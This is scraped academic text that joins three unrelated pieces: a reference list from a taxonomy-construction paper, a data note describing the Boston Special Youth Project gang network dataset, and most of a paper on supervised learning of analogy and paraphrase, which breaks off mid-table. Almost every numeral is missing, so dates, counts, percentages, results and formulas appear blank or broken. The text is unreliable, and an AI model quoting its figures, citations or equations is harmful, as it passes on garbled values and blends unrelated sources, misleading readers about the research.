/research/tacl https://sites.google.com/site/tuanluu /research/tacl references david m. blei, thomas l. griffiths, michael i. jordan, and joshua b. tenenbaum. . hierarchical topic models and the nested chinese restaurant process. advances in neural information processing systems, pages – . kurt bollacker, colin evans, praveen paritosh, tim sturge, and jamie taylor. . freebase: a col- laboratively created graph database for structuring human knowledge. proceedings of the acm sig- mod international conference on management of data, pages – . angel x. chang and christopher d. manning. . sutime: a library for recognizing and normaliz- ing time expressions. proceedings of the conference on language resources and evaluation, pages – . jack edmonds. . optimum branchings. journal of research of the national bureau of standards b, : – . miles efron and gene golovchinsky. . estimation methods for ranking recent information. proceed- ings of the th acm sigir conference, pages – . samah fodeh, bill punch, and pang n. tan. . 
on ontology-driven document clustering using core se- mantic features. knowledge and information sys- tems, ( ): – . sanda m. harabagiu, steven j. maiorano, and marius a. pasca. . open-domain textual question an- swering techniques. natural language engineering, ( ): – . trevor hastie, robert tibshirani, and jerome h. fried- man. . the elements of statistical learning. springer-verlag. marti a. hearst. . automatic acquisition of hy- ponyms from large text corpora. proceedings of the th conference on computational linguistics, pages – . zornitsa kozareva and eduard hovy. . a semi-supervised method to learn and construct tax- onomies using the web. proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – . zornitsa kozareva, ellen riloff, and eduard h. hovy. . semantic class learning from the web with hyponym pattern linkage graphs. proceedings of the th annual meeting of the acl, pages – . dawn j. lawrie and w. bruce croft. . generating hierarchical summaries for web searches. proceed- ings of the th acm sigir conference, pages – . xiaoyan li and bruce w. croft. . time-based lan- guage models. proceedings of the th acm cikm conference, pages – . baichuan li, jing liu, chin-yew lin, irwin king, and michael r. lyu. . a hierarchical entity-based approach to structuralize user generated content in social media: a case of yahoo! answers. proceed- ings of the emnlp conference, pages – . cynthia matuszek, john cabral, michael j. witbrock, and john deoliveira. . an introduction to the syntax and content of cyc. proceedings of the aaai spring symposium, pages – . george a. miller. . wordnet: a lexical database for english. communications of the acm, ( ): – . roberto navigli, paola velardi, and stefano faralli. . a graph-based algorithm for inducing lexical taxonomies from scratch. proceedings of the th in- ternational joint conference on artificial intelligence, pages – . yves petinot, kathleen mckeown, and kapil thadani. . a hierarchical model of web summaries. pro- ceedings of the th annual meeting of the acl, pages – . aurora pons-porrata, rafael berlanga-llavori, and jose ruiz-shulcloper. . topic discovery based on text mining techniques. information processing & management, ( ): – . mark d. smucker and charles l. clarke. . time- based calibration of effectiveness measures. pro- ceedings of the th acm sigir conference, pages – . luu a. tuan, jung j. kim, and see k. ng. . tax- onomy construction using syntactic contextual evi- dence. proceedings of the emnlp conference, pages – . luu a. tuan, yi tay, siu c. hui, and see k. ng. . learning term embeddings for taxonomic relation identification using dynamic weighting neural net- work. proceedings of the emnlp conference, pages – . chi wang, marina danilevsky, nihit desai, yinan zhang, phuong nguyen, thrivikrama taula, and jiawei han. . a phrase mining framework for recursive construction of a topical hierarchy. proceedings of the th acm sigkdd conference, pages – . wentao wu, hongsong li, haixun wang, and kenny q. zhu. . probase: a probabilistic taxonomy for text understanding. proceedings of the acm sig- mod conference, pages – . jianxing yu, zheng-jun zha, meng wang, kai wang, and tat-seng chua. . domain-assisted product as- pect hierarchy generation: towards hierarchical or- ganization of unstructured consumer reviews. pro- ceedings of the emnlp conference, pages – . xingwei zhu, zhao y. ming, and tat-seng chua. . topic hierarchy construction for the organization of multi-source user generated contents. 
proceedings of the th acm sigir conference, pages – .

the boston special youth project affiliation dataset
jacob t.n. young, arizona state university
scott h. decker, arizona state university
gary sweeten, arizona state university

abstract
the boston special youth project (syp) affiliation dataset is a large, bipartite network representing interactions among gang members from seven gangs for nearly three years. the project was conducted from june to may and represents one of the most elaborate gang intervention programs ever conducted. the syp was a "detached-worker program," where an adult (typically a graduate student from one of the surrounding universities) was assigned to an area (local parks, housing projects) to establish and maintain contact with and attempt to change the behaviors of the gangs. these workers collected detailed field notes ("contact cards") documenting the activities of study gang members. however, the social network data collected on the contact cards were never analyzed by syp staff. after the death of the project leader, walter miller, in , the materials from the project became available to a team of researchers (faculty, graduate, and undergraduate students) in the school of criminology and criminal justice at arizona state university. these researchers electronically scanned and digitized the contact cards, and began the process of creating a network from the cards. from these cards, a bipartite network was created where individuals (i.e. gang members) were connected to , events (i.e. contact cards).

authors
jacob t.n. young, associate professor at the school of criminology and criminal justice and associate director of the center for correctional solutions, arizona state university.
scott h. decker, foundation professor and director of the center for public criminology at the school of criminology and criminal justice, arizona state university.
gary sweeten, associate professor at the school of criminology and criminal justice, arizona state university.
direct all correspondence to jacob young (email: jacob.young. @asu.edu, phone: - - , fax: - - ). school of criminology and criminal justice, mc , n. central ave., suite , phoenix, az - .

. overview
the boston special youth project (syp) was a federally funded study of a gang intervention program (national institute of mental health) occurring between and . conducted in and around the neighborhoods of roxbury, ma, the study was one of the first large-scale evaluations of a detached-worker program, and the first designed to specifically address gang delinquency (miller, ; moule, ). spurred by the high-profile murder of a rabbi in (miller, ), the syp was implemented to restructure the activities of adolescent street gangs toward pro-social activities, provide social services to project families, and provide the community with the tools needed to control delinquency following the completion of the study (miller, , , ). the study is best known as the basis for miller's ( a) elaboration of the focal concerns of lower class culture. the syp was a "detached-worker program," where an adult (typically a graduate student from one of the surrounding universities) was assigned to an area (local parks, housing projects) to establish and maintain contact with, and attempt to change the behaviors of the gangs.
for example, outreach workers provided monetary assistance, sports equipment, and clubhouses to the groups, and transported members to and from local sporting and social events. from june to may , five male and two female outreach workers maintained contact with nearly individuals between the ages of and , across roughly two dozen gangs. intensive contact with individuals in seven groups was made during this period. these "intense study" groups were contacted by workers an average of . times per week for an average duration of . hours, and the intervals of the contact periods ranged from to months (miller, ). during these contact periods, workers collected detailed field notes ("contact cards") documenting the activities of study gang members and their interactions with each other, various community members (e.g., shop keepers, law enforcement), and the worker. contact cards also documented hearsay or evidence of conflicts within gangs, or between gangs. there were a total of over , contact cards, providing a rich and unique biography of each gang.

walter miller passed away in , with many of his professional papers and effects collected by a former graduate student, hedy bookin-weiner. dr. bookin-weiner contacted well-known gang researchers in the us about taking possession of these effects. scott decker eventually received the collection in . in , the typed chapters of miller's ( ) previously unpublished book, city gangs, and the roster of gang members from the syp were discovered (moule and decker, ). these data sources were eventually combined with the information from the contact cards. these rosters and the contact cards serve as the source of social network data. from to , a team of researchers (faculty, graduate, and undergraduate students) in the school of criminology and criminal justice at arizona state university electronically scanned and digitized the contact cards, and began the process of creating a network from the cards as part of a federally funded grant (national science foundation award # ; see moule and decker, ). each card was examined to match named persons with names of known gang members from the roster of study participants. from these cards, a bipartite network was created where individuals (i.e. gang members) were connected to events (i.e. contact cards).

. data collection
of all the cards, there were , physical contact cards. the research team was only able to clean , of the cards during the project period. during cleaning, the team noticed that many cards were duplicates of events and represented retyped cards by the social workers. after removing these duplicate cards and cards that were unreadable, there were , cards. of these, , had valid dates that could be used to chronologically order the cards. from there, , cards had valid entries of names, that is, names of individuals from the available rosters. these , cards contain unique individuals from the seven gangs that constitute the "intensive study" groups. as shown in table , the seven gangs studied vary in age, race, gender, and size. several features of the gangs are important to note. first, there is considerable variation in the extent to which the full roster of gang members appears in the contact cards. this is because some members were involved in the criminal justice system, while others would spend varying amounts of time with the group due to employment, dating, or schooling.
for most of the gangs, the individuals in the roster appear at least once. for the hf (black, female) gang, there is very little representation of the roster and this largely reflects the lack of cards available for this gang. the last column of table shows the percentage of the cards represented by each gang. as can be seen, there is also variation in the extent to which each gang constitutes the network. by far, the mm , wm , and wm (all white and male) are the most represented gangs in the network. in fact, these three gangs account for . % of the cards in the data, whereas the other four gangs (i.e. mm , hm , hf, and cf) account for the remaining . %.

table : characteristics of the seven gangs and percentage of contact cards represented by each gang
gang code | gender | race | number on roster | percentage of roster names (number) observed in cards | observation period | percentage of cards (number) represented by each gang
mm | male | white | | % ( ) | / / - / / | . % ( , )
mm | male | white | | % ( ) | / / - / / | . % ( , )
wm | male | white | | % ( ) | / / - / / | . % ( , )
wm | male | white | | % ( ) | / / - / / | . % ( , )
hm | male | black | | % ( ) | / / - / / | . % ( )
hf | female | black | | % ( ) | / / - / / | . % ( )
cf | female | white | | % ( ) | / / - / / | . % a ( , )
note (a): the column does not sum to % because there are , cards where multiple gangs appear on the card. these cards get double counted in the raw frequencies shown for each gang.

response rate: n/a
non-respondent bias: n/a
theoretical groupings: the gangs/corner-groups are defined by geographic areas.
publications using these data: none.
data context: a data component of a gang intervention conducted in boston, ma.
respondents: gang/corner-group members.
longitudinal: yes. data were collected for variable intervals on each of the gangs.
temporality: low. nothing about the data, collection, or context suggests the validity of the data will attenuate over time.
analytical or pedagogical utility: can be used to validate community detection approaches since the groups are known; demonstrate properties of large, bipartite networks; examine longitudinal, bipartite networks; demonstrate consequences of projection to one-mode networks.
known issues: variation in the extent to which data were collected for each of the gangs; the bulk of the network is constituted by three gangs.

. data files and formats
the data are provided in one excel workbook, called bipartite.gangs.data.xlsx, containing three worksheets (tabs).
edgelist.bipartite.gangs. this is the edgelist for the undirected, unweighted bipartite network of ties from individuals to events. there are , edges and , vertices ( gang members and , cards). the first column of the sheet is the individual gang member and the second column is the event (i.e. contact card). as the edges are undirected, each row represents an individual's presence at an event as recorded by the social worker. the vertex ids for the first mode (individuals) begin at and end at . the vertex ids for the second mode (events) begin at and end at , .
event.date. this sheet provides the id (first column) and the month and year (second column) for each of the , events. rows – are the individual gang members with the value "na" for this attribute. the applicable values are a four-digit number indicating in the first two digits the year and the second two digits the month in which the card was recorded. for example, indicates that the card was recorded in month (i.e. june) of year (i.e. ).
actor.attr.
this sheet provides the id (first column), the gang in which the individuals is a member (second column), a dummy variable indicating whether the individual is male or female (third column; = male, = female), and a dummy varia- ble indicating whether the individual is white or non-white (fourth column; = white, = non-white). these attributes are provided for each of the individuals. values of “na” are listed for events. references miller, w. b. ( ). the impact of a community group work program on delinquent corner groups. social service review, , - . miller, w. b. ( a). lower class culture as a gener- ating milieu of gang delinquency. journal of so- cial issues, , - . miller, w. b. ( ). preventative work with street- corner groups: boston delinquency project. annals of the american academy of political science, , – . miller, w. b. ( ). the impact of a ‘total- community’ delinquency control project. social problems, , – . miller, w. b. ( ). city gangs. retrieved from https://ccj.asu.edu/gangresearch. moule, jr., r. k. ( ). the legacy of walter b. mil- ler. in s. h. decker and d. c. pyrooz (eds.). the handbook of gangs (pp. - ). new york, ny: wiley-blackwell. moule jr., r. k., and decker, s. h. ( ). “hidden in plain sight”: locating the men and women of the boston special youth program. journal of qualitative criminal justice and criminology , - . distributional semantics beyond words: supervised learning of analogy and paraphrase peter d. turney national research council canada information and communications technologies ottawa, ontario, canada, k a r peter.turney@nrc-cnrc.gc.ca abstract there have been several efforts to extend distributional semantics beyond individual words, to measure the similarity of word pairs, phrases, and sentences (briefly, tuples; ordered sets of words, contiguous or noncontiguous). one way to extend beyond words is to com- pare two tuples using a function that com- bines pairwise similarities between the com- ponent words in the tuples. a strength of this approach is that it works with both rela- tional similarity (analogy) and compositional similarity (paraphrase). however, past work required hand-coding the combination func- tion for different tasks. the main contribution of this paper is that combination functions are generated by supervised learning. we achieve state-of-the-art results in measuring relational similarity between word pairs (sat analo- gies and semeval task ) and measur- ing compositional similarity between noun- modifier phrases and unigrams (multiple- choice paraphrase questions). introduction harris ( ) and firth ( ) hypothesized that words that appear in similar contexts tend to have similar meanings. this hypothesis is the founda- tion for distributional semantics, in which words are represented by context vectors. the similarity of two words is calculated by comparing the two cor- responding context vectors (lund et al., ; lan- dauer and dumais, ; turney and pantel, ). distributional semantics is highly effective for measuring the semantic similarity between individ- ual words. on a set of eighty multiple-choice syn- onym questions from the test of english as a for- eign language (toefl), a distributional approach recently achieved % accuracy (bullinaria and levy, ). however, it has been difficult to extend distributional semantics beyond individual words, to word pairs, phrases, and sentences. moving beyond individual words, there are vari- ous types of semantic similarity to consider. here we focus on paraphrase and analogy. 
paraphrase is similarity in the meaning of two pieces of text (androutsopoulos and malakasiotis, ). anal- ogy is similarity in the semantic relations of two sets of words (turney, a). it is common to study paraphrase at the sentence level (androutsopoulos and malakasiotis, ), but we prefer to concentrate on the simplest type of paraphrase, where a bigram paraphrases a unigram. for example, dog house is a paraphrase of kennel. in our experiments, we concentrate on noun-modifier bigrams and noun unigrams. analogies map terms in one domain to terms in another domain (gentner, ). the familiar anal- ogy between the solar system and the rutherford- bohr atomic model involves several terms from the domain of the solar system and the domain of the atomic model (turney, a). the simplest type of analogy is proportional anal- ogy, which involves two pairs of words (turney, b). for example, the pair 〈cook, raw〉 is anal- ogous to the pair 〈decorate, plain〉. if we cook a thing, it is no longer raw; if we decorate a thing, it transactions of the association for computational linguistics, ( ) – . action editor: patrick pantel. submitted / ; revised / ; published / . c© association for computational linguistics. is no longer plain. the semantic relations between cook and raw are similar to the semantic relations between decorate and plain. in the following exper- iments, we focus on proportional analogies. erk ( ) distinguished four approaches to extend distributional semantics beyond words: in the first, a single vector space representation for a phrase or sentence is computed from the represen- tations of the individual words (mitchell and lap- ata, ; baroni and zamparelli, ). in the sec- ond, two phrases or sentences are compared by com- bining multiple pairwise similarity values (socher et al., ; turney, ). third, weighted inference rules integrate distributional similarity and formal logic (garrette et al., ). fourth, a single space integrates formal logic and vectors (clarke, ). taking the second approach, turney ( ) intro- duced a dual-space model, with one space for mea- suring domain similarity (similarity of topic or field) and another for function similarity (similarity of role or usage). similarities beyond individual words are calculated by functions that combine domain and function similarities of component words. the dual-space model has been applied to mea- suring compositional similarity (paraphrase recogni- tion) and relational similarity (analogy recognition). in experiments that tested for sensitivity to word order, the dual-space model performed significantly better than competing approaches (turney, ). a limitation of past work with the dual-space model is that the combination functions were hand- coded. our main contribution is to show how hand- coding can be eliminated with supervised learning. for ease of reference, we will call our approach supersim (supervised similarity). with no modifi- cation of supersim for the specific task (relational similarity or compositional similarity), we achieve better results than previous hand-coded models. compositional similarity (paraphrase) compares two contiguous phrases or sentences (n-grams), whereas relational similarity (analogy) does not require contiguity. we use tuple to refer to both con- tiguous and noncontiguous word sequences. we approach analogy as a problem of supervised tuple classification. 
to measure the relational sim- ilarity between two word pairs, we train supersim with quadruples that are labeled as positive and neg- ative examples of analogies. for example, the pro- portional analogy 〈cook, raw, decorate, plain〉 is labeled as a positive example. a quadruple is represented by a feature vector, composed of domain and function similarities from the dual-space model and other features based on corpus frequencies. supersim uses a support vector machine (platt, ) to learn the probability that a quadruple 〈a, b, c, d〉 consists of a word pair 〈a, b〉 and an analogous word pair 〈c, d〉. the probability can be interpreted as the degree of relational similar- ity between the two given word pairs. we also approach paraphrase as supervised tuple classification. to measure the compositional simi- larity beween an m-gram and an n-gram, we train the learning algorithm with (m + n)-tuples that are positive and negative examples of paraphrases. supersim learns to estimate the probability that a triple 〈a, b, c〉 consists of a compositional bigram ab and a synonymous unigram c. for instance, the phrase fish tank is synonymous with aquarium; that is, fish tank and aquarium have high compositional similarity. the triple 〈fish, tank, aquarium〉 is repre- sented using the same features that we used for anal- ogy. the probability of the triple can be interpreted as the degree of compositional similarity between the given bigram and unigram. we review related work in section . the gen- eral feature space for learning relations and compo- sitions is presented in section . the experiments with relational similarity are described in section , and section reports the results with compositional similarity. section discusses the implications of the results. we consider future work in section and conclude in section . related work in semeval , task was concerned with mea- suring the degree of relational similarity between two word pairs (jurgens et al., ) and task (agirre et al., ) examined the degree of seman- tic equivalence between two sentences. these two areas of research have been mostly independent, although socher et al. ( ) and turney ( ) present unified perspectives on the two tasks. we first discuss some work on relational similarity, then some work on compositional similarity, and lastly work that unifies the two types of similarity. . relational similarity lra (latent relational analysis) measures rela- tional similarity with a pair–pattern matrix (turney, b). rows in the matrix correspond to word pairs (a, b) and columns correspond to patterns that connect the pairs (“a for the b”) in a large cor- pus. this is a holistic (noncompositional) approach to distributional similarity, since the word pairs are opaque wholes; the component words have no sep- arate representations. a compositional approach to analogy has a representation for each word, and a word pair is represented by composing the represen- tations for each member of the pair. given a vocabu- lary of n words, a compositional approach requires n representations to handle all possible word pairs, but a holistic approach requires n representations. holistic approaches do not scale up (turney, ). lra required nine days to run. bollegala et al. ( ) answered the sat anal- ogy questions with a support vector machine trained on quadruples (proportional analogies), as we do here. however, their feature vectors are holistic, and hence there are scaling problems. 
herdağdelen and baroni ( ) used a support vector machine to learn relational similarity. their feature vectors contained a combination of holistic and compositional features. measuring relational similarity is closely con- nected to classifying word pairs according to their semantic relations (turney and littman, ). semantic relation classification was the focus of semeval task (girju et al., ) and semeval task (hendrickx et al., ). . compositional similarity to extend distributional semantics beyond words, many researchers take the first approach described by erk ( ), in which a single vector space is used for individual words, phrases, and sentences (lan- dauer and dumais, ; mitchell and lapata, ; mitchell and lapata, ). in this approach, given the words a and b with context vectors a and b, we construct a vector for the bigram ab by applying vec- tor operations to a and b. mitchell and lapata ( ) experiment with many different vector operations and find that element-wise multiplication performs well. the bigram ab is represented by c = a � b, where ci = ai · bi. however, element-wise multiplica- tion is commutative, so the bigrams ab and ba map to the same vector c. in experiments that test for order sensitivity, element-wise multiplication per- forms poorly (turney, ). we can treat the bigram ab as a unit, as if it were a single word, and construct a context vector for ab from occurrences of ab in a large corpus. this holistic approach to representing bigrams performs well when a limited set of bigrams is specified in advance (before building the word–context matrix), but it does not scale up, because there are too many possible bigrams (turney, ). although the holistic approach does not scale up, we can generate a few holistic bigram vectors and use them to train a supervised regression model (guevara, ; baroni and zamparelli, ). given a new bigram cd, not observed in the corpus, the regression model can predict a holistic vector for cd, if c and d have been observed separately. we show in section that this idea can be adapted to train supersim without manually labeled data. socher et al. ( ) take the second approach described by erk ( ), in which two sentences are compared by combining multiple pairwise similar- ity values. they construct a variable-sized similar- ity matrix x, in which the element xij is the sim- ilarity between the i-th phrase of one sentence and the j-th phrase of the other. since supervised learn- ing is simpler with fixed-sized feature vectors, the variable-sized similarity matrix is then reduced to a smaller fixed-sized matrix, to allow comparison of pairs of sentences of varying lengths. . unified perspectives on similarity socher et al. ( ) represent words and phrases with a pair, consisting of a vector and a matrix. the vector captures the meaning of the word or phrase and the matrix captures how a word or phrase mod- ifies the meaning of another word or phrase when they are combined. they apply this matrix–vector representation to both compositions and relations. turney ( ) represents words with two vectors, a vector from domain space and a vector from func- tion space. the domain vector captures the topic or field of the word and the function vector captures the functional role of the word. this dual-space model is applied to both compositions and relations. here we extend the dual-space model of tur- ney ( ) in two ways: hand-coding is replaced with supervised learning and two new sets of fea- tures augment domain and function space. 
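a minimal numpy illustration of the element-wise (hadamard) composition just mentioned, c_i = a_i · b_i, and of why it cannot be sensitive to word order; the vectors are invented toy context vectors, not taken from any of the cited models:

```python
import numpy as np

fantasy = np.array([0.2, 0.0, 0.7, 0.1])   # toy context vector, assumed
world   = np.array([0.5, 0.3, 0.4, 0.0])   # toy context vector, assumed

ab = fantasy * world                       # element-wise multiplication
ba = world * fantasy

print(np.allclose(ab, ba))                 # True: 'fantasy world' and 'world fantasy' collapse
print(fantasy + world)                     # vector addition is commutative as well
```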
moving to supervised learning instead of hand-coding makes it easier to introduce new features. in the dual-space model, parameterized similar- ity measures provided the input values for hand- crafted functions. each task required a different set of hand-crafted functions. the parameters of the similarity measures were tuned using a customized grid search algorithm. the grid search algorithm was not suitable for integration with a supervised learning algorithm. the insight behind supersim is that, given appropriate features, a supervised learn- ing algorithm can replace the grid search algorithm and the hand-crafted functions. features for tuple classification we represent a tuple with four types of features, all based on frequencies in a large corpus. the first type of feature is the logarithm of the frequency of a word. the second type is the positive point- wise mutual information (ppmi) between two words (church and hanks, ; bullinaria and levy, ). third and fourth are the similarities of two words in domain and function space (turney, ). in the following experiments, we use the ppmi matrix from turney et al. ( ) and the domain and function matrices from turney ( ). the three matrices and the word frequency data are based on the same corpus, a collection of web pages gath- ered from university web sites, containing × words. all three matrices are word–context matri- ces, in which the rows correspond to terms (words and phrases) in wordnet. the columns correspond to the contexts in which the terms appear; each matrix involves a different kind of context. the three matrices and the word frequency data are avail- able on request from the author. the matrix files range from two to five gigabytes when packaged and compressed for distri- bution. the corpus was collected by charles clarke at the univer- sity of waterloo. it is about gigabytes of plain text. see http://wordnet.princeton.edu/ for infor- mation about wordnet. let 〈x , x , . . . , xn〉 be an n-tuple of words. the number of features we use to represent this tuple increases as a function of n. the first set of features consists of log frequency values for each word xi in the n-tuple. let freq(xi) be the frequency of xi in the corpus. we define lf(xi) as log(freq(xi)+ ). if xi is not in the corpus, freq(xi) is zero, and thus lf(xi) is also zero. there are n log frequency features, one lf(xi) feature for each word in the n-tuple. the second set of features consists of positive pointwise mutual information values for each pair of words in the n-tuple. we use the raw ppmi matrix from turney et al. ( ). although they computed the singular value decomposition (svd) to project the row vectors into a lower-dimensional space, we need the original high-dimensional columns for our features. the raw ppmi matrix has , rows and , columns with a density of . %. for each term in wordnet, there is a corresponding row in the raw ppmi matrix. for each unigram in word- net, there are two corresponding columns in the raw ppmi matrix, one marked left and the other right. suppose xi corresponds to the i-th row of the ppmi matrix and xj corresponds the j-th column, marked left. the value in the i-th row and j-th col- umn of the ppmi matrix, ppmi(xi, xj, left), is the positive pointwise mutual information of xi and xj co-occurring in the corpus, where xj is the first word to the left of xi, ignoring any intervening stop words (that is, ignoring any words that are not in wordnet). 
if xi (or xj) has no corresponding row (or column) in the matrix, then the ppmi value is set to zero. turney et al. ( ) estimated ppmi(xi, xj, left) by sampling the corpus for phrases containing xi and then looking for xj to the left of xi in the sampled phrases (and likewise for right). due to this sampling process, ppmi(xi, xj, left) does not necessarily equal ppmi(xj, xi, right). for example, suppose xi is a rare word and xj is a common word. with ppmi(xi, xj, left), when we sample phrases containing xi, we are relatively likely to find xj in some of these phrases. with ppmi(xj, xi, right), when we sample phrases containing xj, we are less likely to find any phrases containing xi. although, in theory, ppmi(xi, xj, left) should equal ppmi(xj, xi, right), they are likely to be unequal given a limited sample. from the n-tuple, we select all of the n(n − 1) ordered pairs, 〈xi, xj〉, such that i ≠ j. we then generate two features for each pair, ppmi(xi, xj, left) and ppmi(xi, xj, right). thus there are 2n(n − 1) ppmi values in the second set of features. the third set of features consists of domain space similarity values for each pair of words in the n-tuple. domain space was designed to capture the topic of a word. turney ( ) first constructed a frequency matrix, in which the rows correspond to terms in wordnet and the columns correspond to nearby nouns. given a term xi, the corpus was sampled for phrases containing xi and the phrases were processed with a part-of-speech tagger, to identify nouns. if the noun xj was the closest noun to the left or right of xi, then the frequency count for the i-th row and j-th column was incremented. the hypothesis was that the nouns near a term characterize the topics associated with the term. the word–context frequency matrix for domain space has , rows (terms) and , columns (noun contexts, topics), with a density of . %. the frequency matrix was converted to a ppmi matrix and then smoothed with svd. the svd yields three matrices, u, Σ, and v. a term in domain space is represented by a row vector in u_kΣ_k^p. the parameter k specifies the number of singular values in the truncated singular value decomposition; that is, k is the number of latent factors in the low-dimensional representation of the term (landauer and dumais, ). we generate u_k and Σ_k by deleting the columns in u and Σ corresponding to the smallest singular values. the parameter p raises the singular values in Σ_k to the power p (caron, ). as p goes from one to zero, factors with smaller singular values are given more weight. this has the effect of making the similarity measure more discriminating (turney, ). the similarity of two words in domain space, dom(xi, xj, k, p), is computed by extracting the row vectors in u_kΣ_k^p that correspond to the words xi and xj, and then calculating their cosine. optimal performance requires tuning the parameters k and p for the task (bullinaria and levy, ; turney, ). in the following experiments, we avoid directly tuning k and p by generating features with a variety of values for k and p, allowing the supervised learning algorithm to decide which features to use.
table : the four sets of features and their sizes.
  feature set                  size of set
  lf(xi)                       n
  ppmi(xi, xj, handedness)     2n(n − 1)
  dom(xi, xj, k, p)            n(n − 1) nknp / 2
  fun(xi, xj, k, p)            n(n − 1) nknp / 2
from the n-tuple, we select all n(n − 1)/2 pairs, 〈xi, xj〉, such that i < j. for each pair, we generate domain similarity features, dom(xi, xj, k, p), where k varies from to in steps of and p varies from to in steps of . .
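a minimal sketch of how a dom(xi, xj, k, p) feature can be computed; the matrix here is a random stand-in for the real word-context ppmi matrix, the row indices are assumed, and the (k, p) grids are illustrative only. the fun(xi, xj, k, p) features are computed the same way from the function-space matrix.

```python
import numpy as np

rng = np.random.default_rng(0)
ppmi_matrix = np.abs(rng.normal(size=(1000, 500)))   # stand-in word-context ppmi matrix
row_of = {"cook": 0, "raw": 1, "decorate": 2}        # assumed row indices for terms

# the svd is computed once and reused for every (k, p) setting
u, s, _ = np.linalg.svd(ppmi_matrix, full_matrices=False)

def dom_sim(wi, wj, k, p):
    """cosine of the rows of u_k * sigma_k**p for two words (caron's p weighting)."""
    proj = u[:, :k] * (s[:k] ** p)
    a, b = proj[row_of[wi]], proj[row_of[wj]]
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

# one feature per (k, p) setting; the learner decides which settings are useful
features = [dom_sim("cook", "raw", k, p)
            for k in (100, 200, 300)      # illustrative k grid
            for p in (0.0, 0.5, 1.0)]     # illustrative p grid
print(features)
```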
the number of k values, nk, is and the number of p values, np, is ; therefore there are features, nknp, for each pair, 〈xi, xj〉. thus there are n(n− )nknp domain space similarity values in the third set of features. the fourth set of features consists of function space similarity values for each pair of words in the n-tuple. function space was designed to capture the functional role of a word. it is similar to domain space, except the context is based on verbal patterns, instead of nearby nouns. the hypothesis was that the functional role of a word is characterized by the patterns that relate the word to nearby verbs. the word–context frequency matrix for function space has , rows (terms) and , columns (verb pattern contexts, functional roles), with a den- sity of . %. the frequency matrix was converted to a ppmi matrix and smoothed with svd. from the n-tuple, we select all n(n − ) pairs, 〈xi, xj〉, such that i < j. for each pair, we generate function similarity features, fun(xi, xj, k, p), where k and p vary as they did with domain space. thus there are n(n − )nknp function space similarity values in the fourth set of features. table summarizes the four sets of features and the size of each set as a function of n, the number of words in the given tuple. the values of nk and np ( and ) are considered to be constants. table shows the number of elements in the feature vector, as n varies from to . the total number of features is o(n ). we believe that this is acceptable growth and will scale up to comparing sentence pairs. the four sets of features have a hierarchical rela- tionship. the log frequency features are based on counting isolated occurrences of each word in the n-tuple lf ppmi dom fun total table : number of features for various tuple sizes. corpus. the ppmi features are based on direct co- occurrences of two words; that is, ppmi is only greater than zero if the two words actually occur together in the corpus. domain and function space capture indirect or higher-order co-occurrence, due to the truncated svd (lemaire and denhière, ); that is, the values of dom(xi, xj, k, p) and fun(xi, xj, k, p) can be high even when xi and xj do not actually co-occur in the corpus. we conjec- ture that there are yet higher orders in this hierarchy that would provide improved similarity measures. supersim learns to classify tuples by representing them with these features. supersim uses the sequen- tial minimal optimization (smo) support vector machine (svm) as implemented in weka (platt, ; witten et al., ). the kernel is a normal- ized third-order polynomial. weka provides proba- bility estimates for the classes by fitting the outputs of the svm with logistic regression models. relational similarity this section presents experiments with learning rela- tional similarity using supersim. the training datasets consist of quadruples that are labeled as positive and negative examples of analogies. table shows that the feature vectors have , elements. we experiment with three datasets, a collection of five-choice questions from the sat col- lege entrance exam (turney et al., ), a modi- fied ten-choice variation of the sat questions (tur- ney, ), and the relational similarity dataset from semeval task (jurgens et al., ). weka is available at http://www.cs.waikato.ac. nz/ml/weka/. the sat questions are available on request from the author. the semeval task dataset is available at https:// sites.google.com/site/semeval task /. 
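a rough, self-contained approximation of the classifier just described, using scikit-learn in place of weka's smo; the featurize helper only reproduces the layout of the four feature sets with random numbers, so every statistic in it is an invented placeholder rather than a real corpus value. positive quadruples are expanded with the symmetries of proportional analogies and negatives are generated by shuffling word order, as the experiments below describe.

```python
import numpy as np
from sklearn.svm import SVC

rng = np.random.default_rng(0)

def featurize(tup, n_k=3, n_p=3):
    """stand-in feature vector for an n-tuple: n log-frequency values,
    2n(n-1) ppmi values, and n(n-1)/2 * n_k * n_p dom and fun values each."""
    n = len(tup)
    lf = rng.random(n)
    ppmi = rng.random(2 * n * (n - 1))
    dom = rng.random((n * (n - 1) // 2) * n_k * n_p)
    fun = rng.random((n * (n - 1) // 2) * n_k * n_p)
    return np.concatenate([lf, ppmi, dom, fun])

seeds = [("cook", "raw", "decorate", "plain"),
         ("word", "language", "note", "music"),
         ("mason", "stone", "carpenter", "wood"),
         ("traffic", "street", "water", "riverbed")]
positives = [q for (a, b, c, d) in seeds
             for q in [(a, b, c, d), (b, a, d, c), (c, d, a, b), (d, c, b, a)]]
negatives = [(a, d, c, b) for (a, b, c, d) in positives]   # shuffled word order

X = np.array([featurize(q) for q in positives + negatives])
y = np.array([1] * len(positives) + [0] * len(negatives))

# third-order polynomial kernel with probability outputs, loosely mirroring
# the smo-plus-logistic-fit setup described above
clf = SVC(kernel="poly", degree=3, probability=True).fit(X, y)
print(clf.predict_proba(X[:4])[:, 1])   # interpreted as degrees of relational similarity
```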
stem: word:language choices: ( ) paint:portrait ( ) poetry:rhythm ( ) note:music ( ) tale:story ( ) week:year solution: ( ) note:music table : a five-choice sat analogy question. . five-choice sat questions table is an example of a question from the five-choice sat questions. each five-choice ques- tion yields five labeled quadruples, by combining the stem with each choice. the quadruple 〈word, lan- guage, note, music〉 is labeled positive and the other four quadruples are labeled negative. since learning works better with balanced train- ing data (japkowicz and stephen, ), we use the symmetries of proportional analogies to add more positive examples (lepage and shin-ichi, ). for each positive quadruple, 〈a, b, c, d〉, we add three more positive quadruples, 〈b, a, d, c〉, 〈c, d, a, b〉, and 〈d, c, b, a〉. thus each five-choice question pro- vides four positive and four negative quadruples. we use ten-fold cross-validation to apply super- sim to the sat questions. the folds are constructed so that the eight quadruples from each sat question are kept together in the same fold. to answer a ques- tion in the testing fold, the learned model assigns a probability to each of the five choices and guesses the choice with the highest probability. supersim achieves a score of . % correct ( out of ). table gives the rank of supersim in the list of the top ten results with the sat analogy questions. the scores ranging from . % to . % are not sig- nificantly different from supersim’s score of . %, according to fisher’s exact test at the % confi- dence level. however, supersim answers the sat questions in a few minutes, whereas lra requires nine days, and supersim learns its models automat- ically, unlike the hand-coding of turney ( ). see the state of the art page on the acl wiki at http: //aclweb.org/aclwiki. algorithm reference correct know-best veale ( ) . k-means biçici & yuret ( ) . bagpack herdağdelen & baroni ( ) . vsm turney & littman 